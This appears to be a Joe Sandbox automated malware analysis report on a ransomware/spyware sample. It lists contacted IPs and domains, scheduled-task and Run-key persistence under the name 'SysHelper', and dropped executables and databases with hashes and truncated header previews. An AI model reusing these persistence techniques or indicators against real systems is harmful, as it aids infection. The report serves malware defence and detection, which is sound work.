                                                            linislominyt11.atKorea Republic of
                                                            9318SKB-ASSKBroadbandCoLtdKRtrue
                                                            62.204.41.178
                                                            unknownUnited Kingdom
                                                            30798TNNET-ASTNNetOyMainnetworkFIfalse
                                                            45.138.74.104
                                                            unknownRussian Federation
                                                            202306HOSTGLOBALPLUS-ASRUtrue
                                                            190.117.75.91
                                                            unknownPeru
                                                            12252AmericaMovilPeruSACPEfalse
                                                            85.192.63.46
                                                            unknownRussian Federation
                                                            47711LINEGROUP-ASRUfalse
                                                            211.119.84.111
                                                            unknownKorea Republic of
                                                            3786LGDACOMLGDACOMCorporationKRfalse
                                                            176.44.127.165
                                                            unknownSaudi Arabia
                                                            25019SAUDINETSTC-ASSAfalse
                                                            162.0.217.254
                                                            api.2ip.uaCanada
                                                            35893ACPCAfalse
                                                            193.56.146.177
                                                            unknownunknown
                                                            10753LVLT-10753USfalse
                                                            175.120.254.9
                                                            acacaca.orgKorea Republic of
                                                            9318SKB-ASSKBroadbandCoLtdKRtrue
                                                            Joe Sandbox Version:35.0.0 Citrine
                                                            Analysis ID:682150
                                                            Start date and time:2022-08-11 06:51:09 +02:00
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 11m 25s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:5tLwjRFzAW.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:39
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.rans.troj.spyw.evad.winEXE@19/22@31/12
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HDC Information:
                                                            • Successful, ratio: 13.8% (good quality ratio 8.8%)
                                                            • Quality average: 31.2%
                                                            • Quality standard deviation: 29.4%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                            • TCP Packets have been reduced to 100
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, consent.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                            • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                                            • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            TimeTypeDescription
                                                            06:52:49Task SchedulerRun new task: Firefox Default Browser Agent 5CED7DF019EF31E9 path: C:\Users\user\AppData\Roaming\irbiwat
                                                            06:53:54Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exe s>--Task
                                                            06:53:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exe" --AutoStart
                                                            06:54:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exe" --AutoStart
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            Process:C:\Users\user\AppData\Local\Temp\28E9.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                            Category:dropped
                                                            Size (bytes):73728
                                                            Entropy (8bit):1.1874185457069584
                                                            Encrypted:false
                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                            MD5:72A43D390E478BA9664F03951692D109
                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\28E9.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):684984
                                                            Entropy (8bit):6.857030838615762
                                                            Encrypted:false
                                                            SSDEEP:12288:0oUg2twzqWC4kBNv1pMByWk6TYnhCevOEH07OqHM65BaFBuY3NUNeCLIV/Rqnhab:0oUg2tJWC44WUuY3mMCLA/R+hw
                                                            MD5:15B61E4A910C172B25FB7D8CCB92F754
                                                            SHA1:5D9E319C7D47EB6D31AAED27707FE27A1665031C
                                                            SHA-256:B2AE93D30C8BEB0B26F03D4A8325AC89B92A299E8F853E5CAA51BB32575B06C6
                                                            SHA-512:7C1C982A2B597B665F45024A42E343A0A07A6167F77EE428A203F23BE94B5F225E22A270D1A41B655F3173369F27991770722D765774627229B6B1BBE2A6DC3F
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.9b.........."!.........6...........................................................@A........................4,..S....,..........x............T..........8$...&...............................0..................D............................text............................... ..`.rdata.......0......................@..@.data...<F...@.......&..............@....00cfg...............(..............@..@.rsrc...x............*..............@..@.reloc..8$.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\28E9.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6970840431455908
                                                            Encrypted:false
                                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                            MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                            SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                            SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                            SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\28E9.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                            Category:dropped
                                                            Size (bytes):82970
                                                            Entropy (8bit):7.895892489615255
                                                            Encrypted:false
                                                            SSDEEP:1536:CzyNBlUqBJA57Io5tkoQWKqrXFzkuCN2AyaXQ6Eg0tmj+b7XGDRTt+DlhiVxp66d:zUWJARn5tk6KGF4327aA6fK7WFSKhd
                                                            MD5:482FC19CD3F96C3DA9242265798F7EC0
                                                            SHA1:F07735D226AEF7D49FBD4F9E78C687E8C4A76C35
                                                            SHA-256:39129DDED7D948C84869863FB1EC775C1AF378BD15EF5C2985A58D3745857C5F
                                                            SHA-512:AEB22882FC1A4EB1C36067E3C4A75CC79DEE016B4038AF9740F749CF5F4D2A2B9DE442F62B9DADFAA74A8C52CFAE18C4D2FCF935EE147840518451D91C3844F2
                                                            Malicious:false
                                                            Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\...x....Mj}9oE...7....*......]..(...x..:.e...+..6..r.....#XP.Q^(.*uz.........G...V_.~....3.c.o.?g.......z.8...Q...9(.Z.'.C...U...5..+....)h...i)M.,c.%{$.....x..=.Yp..%5~...f?......<.......GR.....:).d.....3/.H.....Z..+Z..|.7..A.m.c..;g...]..n..3.Ft..(.KI]&b.QE.&(..Y.)....\..._.|.'..wy.....h..S'.8.gc.k...S~.............?.M....?.7?...Y.x.{&|.E{....B..
                                                            Process:C:\Users\user\AppData\Local\Temp\28E9.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):627128
                                                            Entropy (8bit):6.792651884784197
                                                            Encrypted:false
                                                            SSDEEP:12288:dfsiG5KNZea77VUHQqROmbIDm0ICRfCtbtEE/2OH9E2ARlZYSd:df53NZea3V+QqROmum0nRKx79E2ARlrd
                                                            MD5:F07D9977430E762B563EAADC2B94BBFA
                                                            SHA1:DA0A05B2B8D269FB73558DFCF0ED5C167F6D3877
                                                            SHA-256:4191FAF7E5EB105A0F4C5C6ED3E9E9C71014E8AA39BBEE313BC92D1411E9E862
                                                            SHA-512:6AFD512E4099643BBA3FC7700DD72744156B78B7BDA10263BA1F8571D1E282133A433215A9222A7799F9824F244A2BC80C2816A62DE1497017A4B26D562B7EAF
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........V......./....................................................@A............................cQ......,....p...............r..........4C...........................W......h0...............................................text............................... ..`.rdata.......0......................@..@.data........0......................@....00cfg.......P....... ..............@..@.tls.........`......."..............@....rsrc........p.......$..............@..@.reloc..4C.......D..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\28E9.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):449280
                                                            Entropy (8bit):6.670243582402913
                                                            Encrypted:false
                                                            SSDEEP:12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
                                                            MD5:1FB93933FD087215A3C7B0800E6BB703
                                                            SHA1:A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
                                                            SHA-256:2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
                                                            SHA-512:79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\28E9.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):2042296
                                                            Entropy (8bit):6.775178510549486
                                                            Encrypted:false
                                                            SSDEEP:49152:6dvFywfzFAF7fg39IwA49Kap9bGt+qoStYnOsbqbeQom7gN7BpDD5SkIN1g5D92+:pptximYfpx8OwNiVG09
                                                            MD5:F67D08E8C02574CBC2F1122C53BFB976
                                                            SHA1:6522992957E7E4D074947CAD63189F308A80FCF2
                                                            SHA-256:C65B7AFB05EE2B2687E6280594019068C3D3829182DFE8604CE4ADF2116CC46E
                                                            SHA-512:2E9D0A211D2B085514F181852FAE6E7CA6AED4D29F396348BEDB59C556E39621810A9A74671566A49E126EC73A60D0F781FA9085EB407DF1EEFD942C18853BE5
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........&...............................................`............@A.........................!..\...T...@....@..x....................P..h...h...................................................\....!..@....................text...i........................... ..`.rdata..............................@..@.data....N.......*..................@....00cfg.......0......................@..@.rsrc...x....@......................@..@.reloc..h....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\28E9.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):254392
                                                            Entropy (8bit):6.686038834818694
                                                            Encrypted:false
                                                            SSDEEP:6144:uI7A8DMhFE2PlKOcpHSvV6x/CHQyhvs277H0mhWGzTdtb2bbIFxW7zrM2ruyYz+h:uI7A8DMhFE2PlbcpSv0x/CJVUmhDzTvS
                                                            MD5:63A1FE06BE877497C4C2017CA0303537
                                                            SHA1:F4F9CBD7066AFB86877BB79C3D23EDDACA15F5A0
                                                            SHA-256:44BE3153C15C2D18F49674A092C135D3482FB89B77A1B2063D01D02985555FE0
                                                            SHA-512:0475EDC7DFBE8660E27D93B7B8B5162043F1F8052AB28C87E23A6DAF9A5CB93D0D7888B6E57504B1F2359B34C487D9F02D85A34A7F17C04188318BB8E89126BF
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...'.9b.........."!......................................................................@A........................tv..S....w...................................5..hq..............................................D{...............................text...V........................... ..`.rdata..............................@..@.data................~..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\28E9.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1099223
                                                            Entropy (8bit):6.502588297211263
                                                            Encrypted:false
                                                            SSDEEP:24576:9jxwSkSteuT4P/y7HjsXAGJyGvN5z4Rui2IXLbO:9Vww8HyrjsvyWN54RZH+
                                                            MD5:DBF4F8DCEFB8056DC6BAE4B67FF810CE
                                                            SHA1:BBAC1DD8A07C6069415C04B62747D794736D0689
                                                            SHA-256:47B64311719000FA8C432165A0FDCDFED735D5B54977B052DE915B1CBBBF9D68
                                                            SHA-512:B572CA2F2E4A5CC93E4FCC7A18C0AE6DF888AA4C55BC7DA591E316927A4B5CFCBDDA6E60018950BE891FF3B26F470CC5CCE34D217C2D35074322AB84C32A25D1
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".,b.v.........!......................... .....a......................................... .........................n*................................... ...;...................................................................................text...............................`.P`.data...|'... ...(..................@.`..rdata...D...P...F...:..............@.`@.bss....(.............................`..edata..n*.......,..................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...;... ...<..................@.0B/4......8....`......................@.@B/19.....R....p......................@..B/31.....]'...@...(..................@..B/45......-...p......................@..B/57.....\............&..............@.0B/70.....#............2..
                                                            Process:C:\Users\user\AppData\Local\Temp\28E9.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):80128
                                                            Entropy (8bit):6.906674531653877
                                                            Encrypted:false
                                                            SSDEEP:1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
                                                            MD5:1B171F9A428C44ACF85F89989007C328
                                                            SHA1:6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
                                                            SHA-256:9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
                                                            SHA-512:99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\28E9.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.792852251086831
                                                            Encrypted:false
                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\28E9.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                            Category:dropped
                                                            Size (bytes):73728
                                                            Entropy (8bit):1.1874185457069584
                                                            Encrypted:false
                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                            MD5:72A43D390E478BA9664F03951692D109
                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\A658.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):499
                                                            Entropy (8bit):4.498676192647716
                                                            Encrypted:false
                                                            SSDEEP:12:YZIYX7kt/QVFRbIm/QVAY9QVFRHQVFRRaZRQVFRQQVFRUm62jOH4:Y/4FQVFRbI0QVAY9QVFRHQVFRGRQVFRX
                                                            MD5:9B34F54321E4DCCB66CD6428C339A33B
                                                            SHA1:64B330EC2D7236E3A67C495A9AA8A8E8EA8A48B4
                                                            SHA-256:AD2D7CA6CB4492C6E78CFD6166EE744F42F835D2B27725A4D4288F878568D8DF
                                                            SHA-512:F6C6517529934EFE8EA7B13D4B10ED67940D87903BB67F40B3BDCDB399EDBCAF5F3387B42A83F50C1F8921FD02E36B9C312DCE1BF9A64AFDDB81736046321E87
                                                            Malicious:false
                                                            Preview:{"ip":"102.129.143.3","country_code":"CH","country":"Switzerland","country_rus":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0438\u044f","country_ua":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0456\u044f","region":"Zurich","region_rus":"\u0426\u044e\u0440\u0438\u0445","region_ua":"\u0426\u044e\u0440\u0438\u0445","city":"Zurich","city_rus":"\u0426\u044e\u0440\u0438\u0445","city_ua":"\u0426\u044e\u0440\u0438\u0445","latitude":"47.36667","longitude":"8.55","zip_code":"8099","time_zone":"+02:00"}
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:modified
                                                            Size (bytes):348160
                                                            Entropy (8bit):6.6448392140069155
                                                            Encrypted:false
                                                            SSDEEP:6144:oLs6YNPpOX4Dyn5DijLnL6f2qq096STong0b1sfNgPCAbh4Eae:oLANhKB6Lnw2qqk6STogEsfCCAN4te
                                                            MD5:FEEEAA3A0D766A6C52B71C23F796912D
                                                            SHA1:74702F7A1F340C6425DDD29775C51013676D5FAF
                                                            SHA-256:A7C064CEA66E6F5F24936AF237C7AA95AFDEC19F064ABA88B4A181A983D299D5
                                                            SHA-512:A37384A6116EEB8A5705A60DF711D5E3D1B35055D341DEB98C918109BA59201A5AB5DCEA867B350CDC617DED9F5A629FDED091CE16BB90813A3EFCEB394A1E18
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-..PLf.PLf.PLf.N..MLf.N...Lf.w...WLf.PLg..Lf.N...Lf.N..QLf.N...QLf.RichPLf.................PE..L......`.............................Z............@.................................s/..........................................P....p...].......................... ...................................@............................................text............................... ..`.data...hx..........................@....rsrc....]...p...^..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):371184
                                                            Entropy (8bit):6.828829337879975
                                                            Encrypted:false
                                                            SSDEEP:6144:KS3YW1IIsIbi1F5PsKFuE4dEinxd57Uej6DDXo9GN25Wmh4u10fe2SkJJQzB:KS3YW1Iibi1F5PsKFuE4dEinxd57UhnY
                                                            MD5:C9143FA5E2792724172980E5ACC312F0
                                                            SHA1:904335F82B19A563542043635905C9E8B60C48FE
                                                            SHA-256:612DEF8B01093A69AE511693B3888FABE54CA4D4A3AFBF8A99A7212A699E6292
                                                            SHA-512:E2565DCF1808FB36DB19B5EB6E7A53971194B8BFD9CAA6CCF877EB93B3230ED4C7AA24C2F98C066D473659B0DF7F478E4FE539C24DF128F1C1B25951D2685E4F
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 21%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 22%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O..#...p...p...p...q...p...q...p...q...pk..q...pk..q...p..zp...p...p[..pk..q#..po..q...po..p...po..q...pRich...p................PE..L......b............... .*...d.......3.......@....@.......................................@.....................................(........................).......$......T...........................0...@............@..D............................text....(.......*.................. ..`.rdata......@......................@..@.data...`...........................@....rsrc................X..............@..@.reloc...$.......&...Z..............@..B........................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):877568
                                                            Entropy (8bit):7.658285935567359
                                                            Encrypted:false
                                                            SSDEEP:24576:K71dsMtHp6fea2lXhR54Q1kdFU67A4H1ZnXORMtgoG7:KBdvlxROdNAgnrtH
                                                            MD5:1FDD74F600A1E3A9CFA80026CF54BC59
                                                            SHA1:7B0FFB143CD52C75EE849DCE42019BAD0138211E
                                                            SHA-256:B9C3B121EC97DDDA74CBC305280E8157021572B6B6FD59C3B066D0B0F5E54B18
                                                            SHA-512:B619FB507CAC5F4825316BECCB9BB0476B62570458E4EFC5731B804CB9F7187A16F9535F23587E0B662BF6A906D61B1B0E2939F742F0B4BD1797166F535E9287
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Metadefender, Detection: 47%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 56%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)./.H.|.H.|.H.|..+|.H.|..(|.H.|..>|.H.|...|.H.|.H.|.H.|..9|.H.|..)|.H.|..,|.H.|Rich.H.|................PE..L...^.@a.................r...........4............@.........................................................................dq..P.... .............................. ...............................`...@............................................text...xq.......r.................. ..`.data............*...v..............@....rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1601024
                                                            Entropy (8bit):7.806683973845679
                                                            Encrypted:false
                                                            SSDEEP:24576:0gmYfasQzqX2J73PKo0NmWIasAHGP200GgnIj6XIbI7YUSS4cq8THt:0ZYiLJ7E7si9IjqI0B4sH
                                                            MD5:B4EB21B81E6B52F6351E852E08A37CF0
                                                            SHA1:55169A90D308D43298D823493CC6CABCA4DFBF82
                                                            SHA-256:114AA3CD179D20C031074E3A064A9362521E0CF1F917468FA3B60104F3B95540
                                                            SHA-512:74829CFA85FAB2CC8124E605FF8D6508A42725D83928ADFF1C1F8FE9E462881A775E8CBFD306C1A61AF16A87E871DD1758F84A8619AE02090DE9BA0463398008
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....B*.........................................@......................................................................................"................... ...p..................................................................................CODE................................ ..`DATA.....!......."..................@...BSS......................................idata........... ..................@....reloc...p... ...r..................@..P.rsrc...."......."...L..............@..P................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):502784
                                                            Entropy (8bit):6.7446312072585455
                                                            Encrypted:false
                                                            SSDEEP:12288:uhUQ3jSNiEU7pWQZmMmmr1omuSxvB+HTPA7G:qU4jp1WQZmM5s2QTPA7
                                                            MD5:681D98300C552B8C470466D9E8328C8A
                                                            SHA1:D15F4A432A2ABCE96BA9BA74443E566C1FFB933F
                                                            SHA-256:8BBC892AEDC1424CA5C66677B465C826F867515A3FEA28821D015EDCEE71C912
                                                            SHA-512:B909975D0212D5A5A0CB2E2809EE02224AAC729CB761BE97A8E3BE4EE0A1D7470946DA8CF725953C1B2D71FB5FC9DC3C26FD74BCE5DB5CC0E91A106F8BDED887
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................L.............@.......................... ...................@..............................~!.......r...................0...k........................... ......................................................CODE................................ ..`DATA....h...........................@...BSS.....M................................idata..~!......."..................@....tls.....................................rdata....... ......................@..P.reloc...k...0...l..................@..P.rsrc....r.......r...:..............@..P............. ......................@..P........................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\A658.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):877568
                                                            Entropy (8bit):7.658285935567359
                                                            Encrypted:false
                                                            SSDEEP:24576:K71dsMtHp6fea2lXhR54Q1kdFU67A4H1ZnXORMtgoG7:KBdvlxROdNAgnrtH
                                                            MD5:1FDD74F600A1E3A9CFA80026CF54BC59
                                                            SHA1:7B0FFB143CD52C75EE849DCE42019BAD0138211E
